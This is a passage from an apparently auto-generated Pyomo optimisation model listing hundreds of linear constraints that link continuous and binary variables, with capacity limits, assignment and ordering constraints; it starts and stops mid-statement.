= Constraint(expr= m.x668 <= 0) m.c945 = Constraint(expr= m.x669 <= 0) m.c946 = Constraint(expr= m.x670 <= 0) m.c947 = Constraint(expr= m.x671 - 9*m.b863 <= 0) m.c948 = Constraint(expr= m.x672 - 9*m.b864 <= 0) m.c949 = Constraint(expr= m.x673 - 7*m.b865 <= 0) m.c950 = Constraint(expr= m.x674 - 30*m.b866 <= 0) m.c951 = Constraint(expr= m.x675 - 30*m.b867 <= 0) m.c952 = Constraint(expr= m.x676 - 25*m.b868 <= 0) m.c953 = Constraint(expr= m.x677 - 39*m.b869 <= 0) m.c954 = Constraint(expr= m.x678 - 39*m.b870 <= 0) m.c955 = Constraint(expr= m.x679 - 32*m.b871 <= 0) m.c956 = Constraint(expr= m.x680 <= 0) m.c957 = Constraint(expr= m.x681 <= 0) m.c958 = Constraint(expr= m.x682 <= 0) m.c959 = Constraint(expr= m.x683 - 8*m.b875 <= 0) m.c960 = Constraint(expr= m.x684 - 7*m.b876 <= 0) m.c961 = Constraint(expr= m.x685 - 7*m.b877 <= 0) m.c962 = Constraint(expr= m.x686 - 20*m.b878 <= 0) m.c963 = Constraint(expr= m.x687 - 15*m.b879 <= 0) m.c964 = Constraint(expr= m.x688 - 10*m.b880 <= 0) m.c965 = Constraint(expr= m.x689 - 28*m.b881 <= 0) m.c966 = Constraint(expr= m.x690 - 22*m.b882 <= 0) m.c967 = Constraint(expr= m.x691 - 17*m.b883 <= 0) m.c968 = Constraint(expr= m.x692 <= 0) m.c969 = Constraint(expr= m.x693 <= 0) m.c970 = Constraint(expr= m.x694 <= 0) m.c971 = Constraint(expr= m.x695 - 8*m.b887 <= 0) m.c972 = Constraint(expr= m.x696 - 6*m.b888 <= 0) m.c973 = Constraint(expr= m.x697 - 5*m.b889 <= 0) m.c974 = Constraint(expr= m.x698 - 15*m.b890 <= 0) m.c975 = Constraint(expr= m.x699 - 10*m.b891 <= 0) m.c976 = Constraint(expr= m.x700 - 6*m.b892 <= 0) m.c977 = Constraint(expr= m.x701 - 23*m.b893 <= 0) m.c978 = Constraint(expr= m.x702 - 16*m.b894 <= 0) m.c979 = Constraint(expr= m.x703 - 11*m.b895 <= 0) m.c980 = Constraint(expr= m.x608 == 0) m.c981 = Constraint(expr= m.x609 == 0) m.c982 = Constraint(expr= m.x610 == 0) m.c983 = Constraint(expr= m.x611 - 6*m.b803 == 0) m.c984 = Constraint(expr= m.x612 - 4*m.b804 == 0) m.c985 = Constraint(expr= m.x613 - 3*m.b805 == 0) m.c986 = Constraint(expr= m.x614 - 40*m.b806 == 0) m.c987 = Constraint(expr= m.x615 - 35*m.b807 == 0) m.c988 = Constraint(expr= m.x616 - 20*m.b808 == 0) m.c989 = Constraint(expr= m.x617 - 46*m.b809 == 0) m.c990 = Constraint(expr= m.x618 - 39*m.b810 == 0) m.c991 = Constraint(expr= m.x619 - 23*m.b811 == 0) m.c992 = Constraint(expr= m.x620 == 0) m.c993 = Constraint(expr= m.x621 == 0) m.c994 = Constraint(expr= m.x622 == 0) m.c995 = Constraint(expr= m.x623 - 7*m.b815 == 0) m.c996 = Constraint(expr= m.x624 - 4*m.b816 == 0) m.c997 = Constraint(expr= m.x625 - 4*m.b817 == 0) m.c998 = Constraint(expr= m.x626 - 30*m.b818 == 0) m.c999 = Constraint(expr= m.x627 - 25*m.b819 == 0) m.c1000 = Constraint(expr= m.x628 - 20*m.b820 == 0) m.c1001 = Constraint(expr= m.x629 - 37*m.b821 == 0) m.c1002 = Constraint(expr= m.x630 - 29*m.b822 == 0) m.c1003 = Constraint(expr= m.x631 - 22*m.b823 == 0) m.c1004 = Constraint(expr= m.x632 == 0) m.c1005 = Constraint(expr= m.x633 == 0) m.c1006 = Constraint(expr= m.x634 == 0) m.c1007 = Constraint(expr= m.x635 - 7*m.b827 == 0) m.c1008 = Constraint(expr= m.x636 - 5*m.b828 == 0) m.c1009 = Constraint(expr= m.x637 - 3*m.b829 == 0) m.c1010 = Constraint(expr= m.x638 - 15*m.b830 == 0) m.c1011 = Constraint(expr= m.x639 - 5*m.b831 == 0) m.c1012 = Constraint(expr= m.x640 - 2*m.b832 == 0) m.c1013 = Constraint(expr= m.x641 - 22*m.b833 == 0) m.c1014 = Constraint(expr= m.x642 - 10*m.b834 == 0) m.c1015 = Constraint(expr= m.x643 - 5*m.b835 == 0) m.c1016 = Constraint(expr= m.x644 == 0) m.c1017 = Constraint(expr= m.x645 == 0) m.c1018 = Constraint(expr= m.x646 == 0) m.c1019 = Constraint(expr= m.x647 - 11*m.b839 == 0) m.c1020 = Constraint(expr= m.x648 - 8*m.b840 == 0) m.c1021 = Constraint(expr= m.x649 - 6*m.b841 == 0) m.c1022 = Constraint(expr= m.x650 - 13*m.b842 == 0) m.c1023 = Constraint(expr= m.x651 - 8*m.b843 == 0) m.c1024 = Constraint(expr= m.x652 - 3*m.b844 == 0) m.c1025 = Constraint(expr= m.x653 - 24*m.b845 == 0) m.c1026 = Constraint(expr= m.x654 - 16*m.b846 == 0) m.c1027 = Constraint(expr= m.x655 - 9*m.b847 == 0) m.c1028 = Constraint(expr= m.x656 == 0) m.c1029 = Constraint(expr= m.x657 == 0) m.c1030 = Constraint(expr= m.x658 == 0) m.c1031 = Constraint(expr= m.x659 - 10*m.b851 == 0) m.c1032 = Constraint(expr= m.x660 - 7*m.b852 == 0) m.c1033 = Constraint(expr= m.x661 - 6*m.b853 == 0) m.c1034 = Constraint(expr= m.x662 - 13*m.b854 == 0) m.c1035 = Constraint(expr= m.x663 - 8*m.b855 == 0) m.c1036 = Constraint(expr= m.x664 - 3*m.b856 == 0) m.c1037 = Constraint(expr= m.x665 - 23*m.b857 == 0) m.c1038 = Constraint(expr= m.x666 - 15*m.b858 == 0) m.c1039 = Constraint(expr= m.x667 - 9*m.b859 == 0) m.c1040 = Constraint(expr= m.x668 == 0) m.c1041 = Constraint(expr= m.x669 == 0) m.c1042 = Constraint(expr= m.x670 == 0) m.c1043 = Constraint(expr= m.x671 - 9*m.b863 == 0) m.c1044 = Constraint(expr= m.x672 - 9*m.b864 == 0) m.c1045 = Constraint(expr= m.x673 - 7*m.b865 == 0) m.c1046 = Constraint(expr= m.x674 - 30*m.b866 == 0) m.c1047 = Constraint(expr= m.x675 - 30*m.b867 == 0) m.c1048 = Constraint(expr= m.x676 - 25*m.b868 == 0) m.c1049 = Constraint(expr= m.x677 - 39*m.b869 == 0) m.c1050 = Constraint(expr= m.x678 - 39*m.b870 == 0) m.c1051 = Constraint(expr= m.x679 - 32*m.b871 == 0) m.c1052 = Constraint(expr= m.x680 == 0) m.c1053 = Constraint(expr= m.x681 == 0) m.c1054 = Constraint(expr= m.x682 == 0) m.c1055 = Constraint(expr= m.x683 - 8*m.b875 == 0) m.c1056 = Constraint(expr= m.x684 - 7*m.b876 == 0) m.c1057 = Constraint(expr= m.x685 - 7*m.b877 == 0) m.c1058 = Constraint(expr= m.x686 - 20*m.b878 == 0) m.c1059 = Constraint(expr= m.x687 - 15*m.b879 == 0) m.c1060 = Constraint(expr= m.x688 - 10*m.b880 == 0) m.c1061 = Constraint(expr= m.x689 - 28*m.b881 == 0) m.c1062 = Constraint(expr= m.x690 - 22*m.b882 == 0) m.c1063 = Constraint(expr= m.x691 - 17*m.b883 == 0) m.c1064 = Constraint(expr= m.x692 == 0) m.c1065 = Constraint(expr= m.x693 == 0) m.c1066 = Constraint(expr= m.x694 == 0) m.c1067 = Constraint(expr= m.x695 - 8*m.b887 == 0) m.c1068 = Constraint(expr= m.x696 - 6*m.b888 == 0) m.c1069 = Constraint(expr= m.x697 - 5*m.b889 == 0) m.c1070 = Constraint(expr= m.x698 - 15*m.b890 == 0) m.c1071 = Constraint(expr= m.x699 - 10*m.b891 == 0) m.c1072 = Constraint(expr= m.x700 - 6*m.b892 == 0) m.c1073 = Constraint(expr= m.x701 - 23*m.b893 == 0) m.c1074 = Constraint(expr= m.x702 - 16*m.b894 == 0) m.c1075 = Constraint(expr= m.x703 - 11*m.b895 == 0) m.c1076 = Constraint(expr= 20*m.x2 + 20*m.x17 + 18*m.x29 + 16*m.x65 + 20*m.x86 + m.x236 + m.x239 + m.x242 + m.x245 + m.x248 + m.x251 + m.x254 + m.x257 <= 4000) m.c1077 = Constraint(expr= 17*m.x3 + 21*m.x18 + 20*m.x30 + 19*m.x66 + 18*m.x87 + m.x237 + m.x240 + m.x243 + m.x246 + m.x249 + m.x252 + m.x255 + m.x258 <= 3800) m.c1078 = Constraint(expr= 15*m.x4 + 19*m.x19 + 20*m.x31 + 17*m.x67 + 21*m.x88 + m.x238 + m.x241 + m.x244 + m.x247 + m.x250 + m.x253 + m.x256 + m.x259 <= 3600) m.c1079 = Constraint(expr= m.b704 + m.b707 + m.b710 + m.b713 == 1) m.c1080 = Constraint(expr= m.b705 + m.b708 + m.b711 + m.b714 == 1) m.c1081 = Constraint(expr= m.b706 + m.b709 + m.b712 + m.b715 == 1) m.c1082 = Constraint(expr= m.b716 + m.b719 + m.b722 + m.b725 == 1) m.c1083 = Constraint(expr= m.b717 + m.b720 + m.b723 + m.b726 == 1) m.c1084 = Constraint(expr= m.b718 + m.b721 + m.b724 + m.b727 == 1) m.c1085 = Constraint(expr= m.b728 + m.b731 + m.b734 + m.b737 == 1) m.c1086 = Constraint(expr= m.b729 + m.b732 + m.b735 + m.b738 == 1) m.c1087 = Constraint(expr= m.b730 + m.b733 + m.b736 + m.b739 == 1) m.c1088 = Constraint(expr= m.b740 + m.b743 + m.b746 + m.b749 == 1) m.c1089 = Constraint(expr= m.b741 + m.b744 + m.b747 + m.b750 == 1) m.c1090 = Constraint(expr= m.b742 + m.b745 + m.b748 + m.b751 == 1) m.c1091 = Constraint(expr= m.b752 + m.b755 + m.b758 + m.b761 == 1) m.c1092 = Constraint(expr= m.b753 + m.b756 + m.b759 + m.b762 == 1) m.c1093 = Constraint(expr= m.b754 + m.b757 + m.b760 + m.b763 == 1) m.c1094 = Constraint(expr= m.b764 + m.b767 + m.b770 + m.b773 == 1) m.c1095 = Constraint(expr= m.b765 + m.b768 + m.b771 + m.b774 == 1) m.c1096 = Constraint(expr= m.b766 + m.b769 + m.b772 + m.b775 == 1) m.c1097 = Constraint(expr= m.b776 + m.b779 + m.b782 + m.b785 == 1) m.c1098 = Constraint(expr= m.b777 + m.b780 + m.b783 + m.b786 == 1) m.c1099 = Constraint(expr= m.b778 + m.b781 + m.b784 + m.b787 == 1) m.c1100 = Constraint(expr= m.b788 + m.b791 + m.b794 + m.b797 == 1) m.c1101 = Constraint(expr= m.b789 + m.b792 + m.b795 + m.b798 == 1) m.c1102 = Constraint(expr= m.b790 + m.b793 + m.b796 + m.b799 == 1) m.c1103 = Constraint(expr= m.b800 + m.b803 + m.b806 + m.b809 == 1) m.c1104 = Constraint(expr= m.b801 + m.b804 + m.b807 + m.b810 == 1) m.c1105 = Constraint(expr= m.b802 + m.b805 + m.b808 + m.b811 == 1) m.c1106 = Constraint(expr= m.b812 + m.b815 + m.b818 + m.b821 == 1) m.c1107 = Constraint(expr= m.b813 + m.b816 + m.b819 + m.b822 == 1) m.c1108 = Constraint(expr= m.b814 + m.b817 + m.b820 + m.b823 == 1) m.c1109 = Constraint(expr= m.b824 + m.b827 + m.b830 + m.b833 == 1) m.c1110 = Constraint(expr= m.b825 + m.b828 + m.b831 + m.b834 == 1) m.c1111 = Constraint(expr= m.b826 + m.b829 + m.b832 + m.b835 == 1) m.c1112 = Constraint(expr= m.b836 + m.b839 + m.b842 + m.b845 == 1) m.c1113 = Constraint(expr= m.b837 + m.b840 + m.b843 + m.b846 == 1) m.c1114 = Constraint(expr= m.b838 + m.b841 + m.b844 + m.b847 == 1) m.c1115 = Constraint(expr= m.b848 + m.b851 + m.b854 + m.b857 == 1) m.c1116 = Constraint(expr= m.b849 + m.b852 + m.b855 + m.b858 == 1) m.c1117 = Constraint(expr= m.b850 + m.b853 + m.b856 + m.b859 == 1) m.c1118 = Constraint(expr= m.b860 + m.b863 + m.b866 + m.b869 == 1) m.c1119 = Constraint(expr= m.b861 + m.b864 + m.b867 + m.b870 == 1) m.c1120 = Constraint(expr= m.b862 + m.b865 + m.b868 + m.b871 == 1) m.c1121 = Constraint(expr= m.b872 + m.b875 + m.b878 + m.b881 == 1) m.c1122 = Constraint(expr= m.b873 + m.b876 + m.b879 + m.b882 == 1) m.c1123 = Constraint(expr= m.b874 + m.b877 + m.b880 + m.b883 == 1) m.c1124 = Constraint(expr= m.b884 + m.b887 + m.b890 + m.b893 == 1) m.c1125 = Constraint(expr= m.b885 + m.b888 + m.b891 + m.b894 == 1) m.c1126 = Constraint(expr= m.b886 + m.b889 + m.b892 + m.b895 == 1) m.c1127 = Constraint(expr= m.b707 - m.b708 <= 0) m.c1128 = Constraint(expr= m.b707 - m.b709 <= 0) m.c1129 = Constraint(expr= m.b708 - m.b709 <= 0) m.c1130 = Constraint(expr= m.b710 - m.b711 <= 0) m.c1131 = Constraint(expr= m.b710 - m.b712 <= 0) m.c1132 = Constraint(expr= m.b711 - m.b712 <= 0) m.c1133 = Constraint(expr= m.b713 - m.b714 <= 0) m.c1134 = Constraint(expr= m.b713 - m.b715 <= 0) m.c1135 = Constraint(expr= m.b714 - m.b715 <= 0) m.c1136 = Constraint(expr= m.b719 - m.b720 <= 0) m.c1137 = Constraint(expr= m.b719 - m.b721 <= 0) m.c1138 = Constraint(expr= m.b720 - m.b721 <= 0) m.c1139 = Constraint(expr= m.b722 - m.b723 <= 0) m.c1140 = Constraint(expr= m.b722 - m.b724 <= 0) m.c1141 = Constraint(expr= m.b723 - m.b724 <= 0) m.c1142 = Constraint(expr= m.b725 - m.b726 <= 0) m.c1143 = Constraint(expr= m.b725 - m.b727 <= 0) m.c1144 = Constraint(expr= m.b726 - m.b727 <= 0) m.c1145 = Constraint(expr= m.b731 - m.b732 <= 0) m.c1146 = Constraint(expr= m.b731 - m.b733 <= 0) m.c1147 = Constraint(expr= m.b732 - m.b733 <= 0) m.c1148 = Constraint(expr= m.b734 - m.b735 <= 0) m.c1149 = Constraint(expr= m.b734 - m.b736 <= 0) m.c1150 = Constraint(expr= m.b735 - m.b736 <= 0) m.c1151 = Constraint(expr= m.b737 - m.b738 <= 0) m.c1152 = Constraint(expr= m.b737 - m.b739 <= 0) m.c1153 = Constraint(expr= m.b738 - m.b739 <= 0) m.c1154 = Constraint(expr= m.b743 - m.b744 <= 0) m.c1155 = Constraint(expr= m.b743 - m.b745 <= 0) m.c1156 = Constraint(expr= m.b744 - m.b745 <= 0) m.c1157 = Constraint(expr= m.b746 - m.b747 <= 0) m.c1158 = Constraint(expr= m.b746 - m.b748 <= 0) m.c1159 = Constraint(expr= m.b747 - m.b748 <= 0) m.c1160 = Constraint(expr= m.b749 - m.b750 <= 0) m.c1161 = Constraint(expr= m.b749 - m.b751 <= 0) m.c1162 = Constraint(expr= m.b750 - m.b751 <= 0) m.c1163 = Constraint(expr= m.b755 - m.b756 <= 0) m.c1164 = Constraint(expr= m.b755 - m.b757 <= 0) m.c1165 = Constraint(expr= m.b756 - m.b757 <= 0) m.c1166 = Constraint(expr= m.b758 - m.b759 <= 0) m.c1167 = Constraint(expr= m.b758 - m.b760 <= 0) m.c1168 = Constraint(expr= m.b759 - m.b760 <= 0) m.c1169 = Constraint(expr= m.b761 - m.b762 <= 0) m.c1170 = Constraint(expr= m.b761 - m.b763 <= 0) m.c1171 = Constraint(expr= m.b762 - m.b763 <= 0) m.c1172 = Constraint(expr= m.b767 - m.b768 <= 0) m.c1173 = Constraint(expr= m.b767 - m.b769 <= 0) m.c1174 = Constraint(expr= m.b768 - m.b769 <= 0) m.c1175 = Constraint(expr= m.b770 - m.b771 <= 0) m.c1176 = Constraint(expr= m.b770 - m.b772 <= 0) m.c1177 = Constraint(expr= m.b771 - m.b772 <= 0) m.c1178 = Constraint(expr= m.b773 - m.b774 <= 0) m.c1179 = Constraint(expr= m.b773 - m.b775 <= 0) m.c1180 = Constraint(expr= m.b774 - m.b775 <= 0) m.c1181 = Constraint(expr= m.b779 - m.b780 <= 0) m.c1182 = Constraint(expr= m.b779 - m.b781 <= 0) m.c1183 = Constraint(expr= m.b780 - m.b781 <= 0) m.c1184 = Constraint(expr= m.b782 - m.b783 <= 0) m.c1185 = Constraint(expr= m.b782 - m.b784 <= 0) m.c1186 = Constraint(expr= m.b783 - m.b784 <= 0) m.c1187 = Constraint(expr= m.b785 - m.b786 <= 0) m.c1188 = Constraint(expr= m.b785 - m.b787 <= 0) m.c1189 = Constraint(expr= m.b786 - m.b787 <= 0) m.c1190 = Constraint(expr= m.b791 - m.b792 <= 0) m.c1191 = Constraint(expr= m.b791 - m.b793 <= 0) m.c1192 = Constraint(expr= m.b792 - m.b793 <= 0) m.c1193 = Constraint(expr= m.b794 - m.b795 <= 0) m.c1194 = Constraint(expr= m.b794 - m.b796 <= 0) m.c1195 = Constraint(expr= m.b795 - m.b796 <= 0) m.c1196 = Constraint(expr= m.b797 - m.b798 <= 0) m.c1197 = Constraint(expr= m.b797 - m.b799 <= 0) m.c1198 = Constraint(expr= m.b798 - m.b799 <= 0) m.c1199 = Constraint(expr= - m.b801 + m.b803 <= 0) m.c1200 = Constraint(expr= - m.b802 + m.b803 <= 0) m.c1201 = Constraint(expr= - m.b800 + m.b804 <= 0) m.c1202 = Constraint(expr= - m.b802 + m.b804 <= 0) m.c1203 = Constraint(expr= - m.b800 + m.b805 <= 0) m.c1204 = Constraint(expr= - m.b801 + m.b805 <= 0) m.c1205 = Constraint(expr= - m.b801 + m.b806 <= 0) m.c1206 = Constraint(expr= - m.b802 + m.b806 <= 0) m.c1207 = Constraint(expr= - m.b800 + m.b807 <= 0) m.c1208 = Constraint(expr= - m.b802 + m.b807 <= 0) m.c1209 = Constraint(expr= - m.b800 + m.b808 <= 0) m.c1210 = Constraint(expr= - m.b801 + m.b808 <= 0) m.c1211 = Constraint(expr= - m.b801 + m.b809 <= 0) m.c1212 = Constraint(expr= - m.b802 + m.b809 <= 0) m.c1213 = Constraint(expr= - m.b800 + m.b810 <= 0) m.c1214 = Constraint(expr= - m.b802 + m.b810 <= 0) m.c1215 = Constraint(expr= - m.b800 + m.b811 <= 0) m.c1216 = Constraint(expr= - m.b801 + m.b811 <= 0) m.c1217 = Constraint(expr= - m.b813 + m.b815 <= 0) m.c1218 = Constraint(expr= - m.b814 + m.b815 <= 0) m.c1219 = Constraint(expr= - m.b812 + m.b816 <= 0) m.c1220 = Constraint(expr= - m.b814 + m.b816 <= 0) m.c1221 = Constraint(expr= - m.b812 + m.b817 <= 0) m.c1222 = Constraint(expr= - m.b813 + m.b817 <= 0) m.c1223 = Constraint(expr= - m.b813 + m.b818 <= 0) m.c1224 = Constraint(expr= - m.b814 + m.b818 <= 0) m.c1225 = Constraint(expr= - m.b812 + m.b819 <= 0) m.c1226 = Constraint(expr= - m.b814 + m.b819 <= 0) m.c1227 = Constraint(expr= - m.b812 + m.b820 <= 0) m.c1228 = Constraint(expr= - m.b813 + m.b820 <= 0) m.c1229 = Constraint(expr= - m.b813 + m.b821 <= 0) m.c1230 = Constraint(expr= - m.b814 + m.b821 <= 0) m.c1231 = Constraint(expr= - m.b812 + m.b822 <= 0) m.c1232 = Constraint(expr= - m.b814 + m.b822 <= 0) m.c1233 = Constraint(expr= - m.b812 + m.b823 <= 0) m.c1234 = Constraint(expr= - m.b813 + m.b823 <= 0) m.c1235 = Constraint(expr= - m.b825 + m.b827 <= 0) m.c1236 = Constraint(expr= - m.b826 + m.b827 <= 0) m.c1237 = Constraint(expr= - m.b824 + m.b828 <= 0) m.c1238 = Constraint(expr= - m.b826 + m.b828 <= 0) m.c1239 = Constraint(expr= - m.b824 + m.b829 <= 0) m.c1240 = Constraint(expr= - m.b825 + m.b829 <= 0) m.c1241 = Constraint(expr= - m.b825 + m.b830 <= 0) m.c1242 = Constraint(expr= - m.b826 + m.b830 <= 0) m.c1243 = Constraint(expr= - m.b824 + m.b831 <= 0) m.c1244 = Constraint(expr= - m.b826 + m.b831 <= 0) m.c1245 = Constraint(expr= - m.b824 + m.b832 <= 0) m.c1246 = Constraint(expr= - m.b825 + m.b832 <= 0) m.c1247 = Constraint(expr= - m.b825 + m.b833 <= 0) m.c1248 = Constraint(expr= - m.b826 + m.b833 <= 0) m.c1249 = Constraint(expr= - m.b824 + m.b834 <= 0) m.c1250 = Constraint(expr= - m.b826 + m.b834 <= 0) m.c1251 = Constraint(expr= - m.b824 + m.b835 <= 0) m.c1252 = Constraint(expr= - m.b825 + m.b835 <= 0) m.c1253 = Constraint(expr= - m.b837 + m.b839 <= 0) m.c1254 = Constraint(expr= - m.b838 + m.b839 <= 0) m.c1255 = Constraint(expr= - m.b836 + m.b840 <= 0) m.c1256 = Constraint(expr= - m.b838 + m.b840 <= 0) m.c1257 = Constraint(expr= - m.b836 + m.b841 <= 0) m.c1258 = Constraint(expr= - m.b837 + m.b841 <= 0) m.c1259 = Constraint(expr= - m.b837 + m.b842 <= 0) m.c1260 = Constraint(expr= - m.b838 + m.b842 <= 0) m.c1261 = Constraint(expr= - m.b836 + m.b843 <= 0) m.c1262 = Constraint(expr= - m.b838 + m.b843 <= 0) m.c1263 = Constraint(expr= - m.b836 + m.b844 <= 0) m.c1264 = Constraint(expr= - m.b837 + m.b844 <= 0) m.c1265 = Constraint(expr= - m.b837 + m.b845 <= 0) m.c1266 = Constraint(expr= - m.b838 + m.b845 <= 0) m.c1267 = Constraint(expr= - m.b836 + m.b846 <= 0) m.c1268 = Constraint(expr= - m.b838 + m.b846 <= 0) m.c1269 = Constraint(expr= - m.b836 + m.b847 <= 0) m.c1270 = Constraint(expr= - m.b837 + m.b847 <= 0) m.c1271 = Constraint(expr= - m.b849 + m.b851 <= 0) m.c1272 = Constraint(expr= - m.b850 + m.b851 <= 0) m.c1273 = Constraint(expr= - m.b848 + m.b852 <= 0) m.c1274 = Constraint(expr= - m.b850 + m.b852 <= 0) m.c1275 = Constraint(expr= - m.b848 + m.b853 <= 0) m.c1276 = Constraint(expr= - m.b849 + m.b853 <= 0) m.c1277 = Constraint(expr= - m.b849 + m.b854 <= 0) m.c1278 = Constraint(expr= - m.b850 + m.b854 <= 0) m.c1279 = Constraint(expr= - m.b848 + m.b855 <= 0) m.c1280 = Constraint(expr= - m.b850 + m.b855 <= 0) m.c1281 = Constraint(expr= - m.b848 + m.b856 <= 0) m.c1282 = Constraint(expr= - m.b849 + m.b856 <= 0) m.c1283 = Constraint(expr= - m.b849 + m.b857 <= 0) m.c1284 = Constraint(expr= - m.b850 + m.b857 <= 0) m.c1285 = Constraint(expr= - m.b848 + m.b858 <= 0) m.c1286 = Constraint(expr= - m.b850 + m.b858 <= 0) m.c1287 = Constraint(expr= - m.b848 + m.b859 <= 0) m.c1288 = Constraint(expr= - m.b849 + m.b859 <= 0) m.c1289 = Constraint(expr= - m.b861 + m.b863 <= 0) m.c1290 = Constraint(expr= - m.b862 + m.b863 <= 0) m.c1291 = Constraint(expr= - m.b860 + m.b864 <= 0) m.c1292 = Constraint(expr= - m.b862 + m.b864 <= 0) m.c1293 = Constraint(expr= - m.b860 + m.b865 <= 0) m.c1294 = Constraint(expr= - m.b861 + m.b865 <= 0) m.c1295 = Constraint(expr= - m.b861 + m.b866 <= 0) m.c1296 = Constraint(expr= - m.b862 + m.b866 <= 0) m.c1297 = Constraint(expr= - m.b860 + m.b867 <= 0) m.c1298 = Constraint(expr= - m.b862 + m.b867 <= 0) m.c1299 = Constraint(expr= - m.b860 + m.b868 <= 0) m.c1300 = Constraint(expr= - m.b861 + m.b868 <= 0) m.c1301 = Constraint(expr= - m.b861 + m.b869 <= 0) m.c1302 = Constraint(expr= - m.b862 + m.b869 <= 0) m.c1303 = Constraint(expr= - m.b860 + m.b870 <= 0) m.c1304 = Constraint(expr= - m.b862 + m.b870 <= 0) m.c1305 = Constraint(expr= - m.b860 + m.b871 <= 0) m.c1306 = Constraint(expr= - m.b861 + m.b871 <= 0) m.c1307 = Constraint(expr= - m.b873 + m.b875 <= 0) m.c1308 = Constraint(expr= - m.b874 + m.b875 <= 0) m.c1309 = Constraint(expr= - m.b872 + m.b876 <= 0) m.c1310 = Constraint(expr= - m.b874 + m.b876 <= 0) m.c1311 = Constraint(expr= - m.b872 + m.b877 <= 0) m.c1312 = Constraint(expr= - m.b873 + m.b877 <= 0) m.c1313 = Constraint(expr= - m.b873 + m.b878 <= 0) m.c1314 = Constraint(expr= - m.b874 + m.b878 <= 0) m.c1315 = Constraint(expr= - m.b872 + m.b879 <= 0) m.c1316 = Constraint(expr= - m.b874 + m.b879 <= 0) m.c1317 = Constraint(expr= - m.b872 + m.b880 <= 0) m.c1318 = Constraint(expr= - m.b873 + m.b880 <= 0) m.c1319 = Constraint(expr= - m.b873 + m.b881 <= 0) m.c1320 = Constraint(expr= - m.b874 + m.b881 <= 0) m.c1321 = Constraint(expr= - m.b872 + m.b882 <= 0) m.c1322 = Constraint(expr= - m.b874 + m.b882 <= 0) m.c1323 = Constraint(expr= - m.b872 + m.b883 <= 0) m.c1324 = Constraint(expr= - m.b873 + m.b883 <= 0) m.c1325 = Constraint(expr= - m.b885 + m.b887 <= 0) m.c1326 = Constraint(expr= - m.b886 + m.b887 <= 0) m.c1327 = Constraint(expr= - m.b884 + m.b888 <= 0) m.c1328 = Constraint(expr= - m.b886 + m.b888 <= 0) m.c1329 = Constraint(expr= - m.b884 + m.b889 <= 0) m.c1330 = Constraint(expr= - m.b885 + m.b889 <= 0) m.c1331 = Constraint(expr= - m.b885 + m.b890 <= 0) m.c1332 = Constraint(expr= - m.b886 + m.b890 <= 0) m.c1333 = Constraint(expr= - m.b884 + m.b891 <= 0) m.c1334 = Constraint(expr= - m.b886 + m.b891 <= 0) m.c1335 = Constraint(expr= - m.b884 + m.b892 <= 0) m.c1336 = Constraint(expr= - m.b885 + m.b892 <= 0) m.c1337 = Constraint(expr= - m.b885 + m.b893 <= 0) m.c1338 = Constraint(expr= - m.b886 + m.b893 <= 0) m.c1339 = Constraint(expr= - m.b884 + m.b894 <= 0) m.c1340 = Constraint(expr= - m.b886 + m.b894 <= 0) m.c1341 = Constraint(expr= - m.b884 + m.b895 <= 0) m.c1342 = Constraint(expr= - m.b885 + m.b895 <= 0) m.c1343 = Constraint(expr= m.b704 - m.b800 <= 0) m.c1344 = Constraint(expr= m.b705 - m.b801 <= 0) m.c1345 = Constraint(expr= m.b706 - m.b802 <= 0) m.c1346 = Constraint(expr= m.b716 - m.b812 <= 0) m.c1347 = Constraint(expr= m.b717 - m.b813 <= 0) m.c1348 = Constraint(expr= m.b718 - m.b814 <= 0) m.c1349 = Constraint(expr= m.b728 - m.b824 <= 0) m.c1350 = Constraint(expr= m.b729 - m.b825 <= 0) m.c1351 = Constraint(expr= m.b730 - m.b826 <= 0) m.c1352 = Constraint(expr= m.b740 - m.b836 <= 0) m.c1353 = Constraint(expr= m.b741 - m.b837 <= 0) m.c1354 = Constraint(expr= m.b742 - m.b838 <= 0) m.c1355 = Constraint(expr= m.b752 - m.b848 <= 0) m.c1356 = Constraint(expr= m.b753 - m.b849 <= 0) m.c1357 = Constraint(expr= m.b754 - m.b850 <= 0) m.c1358 = Constraint(expr= m.b764 - m.b860 <= 0) m.c1359 = Constraint(expr= m.b765 - m.b861 <= 0) m.c1360 = Constraint(expr= m.b766 - m.b862 <= 0) m.c1361 = Constraint(expr= m.b776 - m.b872 <= 0) m.c1362 = Constraint(expr= m.b777 - m.b873 <= 0) m.c1363 = Constraint(expr= m.b778 - m.b874 <= 0) m.c1364 = Constraint(expr= m.b788 - m.b884 <= 0) m.c1365 = Constraint(expr= m.b789 - m.b885 <= 0) m.c1366 = Constraint(expr= m.b790 - m.b886 <= 0) m.c1367 = Constraint(expr= m.b707 - m.b803 <= 0) m.c1368 = Constraint(expr= - m.b707 + m.b708 - m.b804 <= 0) m.c1369 = Constraint(expr= - m.b707 - m.b708 + m.b709 - m.b805 <= 0) m.c1370 = Constraint(expr= m.b710 - m.b806 <= 0) m.c1371 = Constraint(expr= - m.b710 + m.b711 - m.b807 <= 0) m.c1372 = Constraint(expr= - m.b710 - m.b711 + m.b712 - m.b808 <= 0) m.c1373 = Constraint(expr= m.b713 - m.b809 <= 0) m.c1374 = Constraint(expr= - m.b713 + m.b714 - m.b810 <= 0) m.c1375 = Constraint(expr= - m.b713 - m.b714 + m.b715 - m.b811 <= 0) m.c1376 = Constraint(expr= m.b719 - m.b815 <= 0) m.c1377 = Constraint(expr= - m.b719 + m.b720 - m.b816 <= 0) m.c1378 = Constraint(expr= - m.b719 - m.b720 + m.b721 - m.b817 <= 0) m.c1379 = Constraint(expr= m.b722 - m.b818 <= 0) m.c1380 = Constraint(expr= - m.b722 + m.b723 - m.b819 <= 0) m.c1381 = Constraint(expr= - m.b722 - m.b723 + m.b724 - m.b820 <= 0) m.c1382 = Constraint(expr= m.b725 - m.b821 <= 0) m.c1383 = Constraint(expr= - m.b725 + m.b726 - m.b822 <= 0) m.c1384 = Constraint(expr= - m.b725 - m.b726 + m.b727 - m.b823 <= 0) m.c1385 = Constraint(expr= m.b731 - m.b827 <= 0) m.c1386 = Constraint(expr= - m.b731 + m.b732 - m.b828 <= 0) m.c1387 = Constraint(expr= - m.b731 - m.b732 + m.b733 - m.b829 <= 0) m.c1388 = Constraint(expr= m.b734 - m.b830 <= 0) m.c1389 = Constraint(expr= - m.b734 + m.b735 - m.b831 <= 0) m.c1390 = Constraint(expr= - m.b734 - m.b735 + m.b736 - m.b832 <= 0) m.c1391 = Constraint(expr= m.b737 - m.b833 <= 0) m.c1392 = Constraint(expr= - m.b737 + m.b738 - m.b834 <= 0) m.c1393 = Constraint(expr= - m.b737 - m.b738 + m.b739 - m.b835 <= 0) m.c1394 = 